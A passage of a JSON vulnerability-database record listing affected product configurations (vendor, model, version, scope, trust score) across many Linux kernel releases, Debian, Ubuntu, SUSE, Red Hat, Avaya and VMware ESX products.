        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20-2"
      },
      {
        "model": "kernel -rc8-git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "esx server esx400-200909401",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "enterprise linux as 4.7.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "esx server esx400-200912403",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "enterprise mrg for red hat enterprise linux version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "v15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "kernel pre-6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "meeting exchange sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "linux enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel .0-test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -test1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "esx server esx400-201003405",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "messaging storage server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "message networking sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "esx server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "enterprise linux ws",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "pardus",
        "version": "20090"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31.11"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -pre5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.3"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2712"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18-53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.5"
      },
      {
        "model": "message networking",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.28"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel pre-2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel .0-test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel -rc7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "kernel 2.6.25-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.8"
      },
      {
        "model": "kernel .0-test3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel 2.6.32-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.14"
      },
      {
        "model": "meeting exchange",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.2"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel -rc8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "kernel 2.6.32-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15-27.48"
      },
      {
        "model": "kernel pre-8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.10"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.18"
      },
      {
        "model": "linux enterprise desktop sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel -pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "esx server esx400-201005401",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2010.0"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.37.6"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1.2"
      },
      {
        "model": "kernel 2.6.20-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel pre1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.21"
      },
      {
        "model": "kernel 2.6.32-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "linux enterprise desktop sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "linux enterprise server debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel -pre4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.0"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "enterprise virtualization hypervisor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "2.1"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "enterprise linux es 4.7.z",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.13"
      },
      {
        "model": "kernel -rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel -git5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.14"
      },
      {
        "model": "enterprise linux 5.3.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1.1"
      },
      {
        "model": "kernel -test7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel 2.6.32-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28"
      },
      {
        "model": "aura sip enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "kernel -pre3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.20"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "enterprise linux as",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "windriver",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "linux m68k",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.3"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "enterprise linux 5.2.z server",
        "scope": null,
        "trust": 0.3,
        "vendor": "redhat",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel 2.6.21-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "windriver",
        "version": "3.1"
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "5.1"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "9.04"
      },
      {
        "model": "linux mipsel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel -git13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel -test11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel -git8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel -rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "kernel -rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel -pre2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.27"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel 2.6.21-rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.26-rc5-git1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel -rc6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30"
      },
      {
        "model": "proactive contact",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.1.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel .0-test6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.33.6"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "windriver",
        "version": "0"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "kernel 2.6.21-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.11"
      },
      {
        "model": "kernel -test10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.332"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel rc1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4.36.6"
      },
      {
        "model": "kernel .0-test9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.4"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "linux lts powerpc",
